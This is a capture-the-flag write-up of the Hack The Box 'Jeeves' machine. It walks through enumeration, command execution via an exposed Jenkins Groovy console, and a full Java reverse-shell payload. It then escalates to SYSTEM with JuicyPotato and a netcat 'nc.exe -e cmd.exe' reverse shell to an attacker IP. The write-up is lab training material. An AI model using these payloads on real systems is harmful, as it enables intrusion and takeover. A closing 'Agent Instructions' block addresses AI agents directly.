# Jeeves ## Service Enumeration `nmapAutomator.sh -H 10.10.10.63 -t all` ![](/files/-MadsKQyTWzuAf0z9MBC) ### Port 80 A HTTP service runs on port 80. Entering an input in the search bar results in a server error, showing us some information about the versions of the services and OS it is running. ![](/files/-MadsNgdPDvTao_fZCDp) ### Port 50000 Another web service, running Jetty, is on port 50000. Using the `directory-list-2.3-medium.txt` wordlist from dirbuster, we can perform subdirectory enumeration on the target. `gobuster dir -u http://10.10.10.63:50000/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt` This uncovers a `/askjeeves` directory. By going to `http://10.10.10.63:50000/askjeeves/`, we find a Jenkins page. ![](/files/-MadsQ9233V8sqWwjsx5) ## Exploitation By going to `http://10.10.10.63:50000/askjeeves/script`, we can execute scripts on the Groovy script console. ```java def cmd = "cmd.exe /c dir".execute(); println("${cmd.text}"); ``` By changing first line in the script, we can execute arbitrary shell commands. ![](/files/-MadsSlYQRDIcUL5_heK) We can change the script to instead trigger a reverse shell. Source: ```java String host="10.10.14.23"; int port=4242; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); ``` On our Netcat listener, we obtain a reverse shell. ![](/files/-MadsVpdC1tyjsnFd88d) ## Privilege Escalation We can use WinPEAS to enumerate. ![](/files/-MadsYTbrPIiraQ5ww8G) Very quickly, we see that the SeImpersonatePrivilege token is enabled. We can exploit this with JuicyPotato (). After transferring JuicyPotato.exe and Netcat, we can run the following command to get another shell: `JuicyPotato -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\users\kohsuke\nc.exe -e cmd.exe 10.10.14.23 443" -t *` ![](/files/-MadsaVLrVLe9v27z24f) We have successfully obtained SYSTEM privileges. We find a `hm.txt` in place of `root.txt`. ![](/files/-MadscqVoG8zpewhcHrm) However, we can find that there is an additional data stream hidden in the file. ![](/files/-Madsfah-dkABbWwj_gA) ![](/files/-MadsjzbQsapwzic0pEs) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://pentesting.zeyu2001.com/hack-the-box/medium/jeeves.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.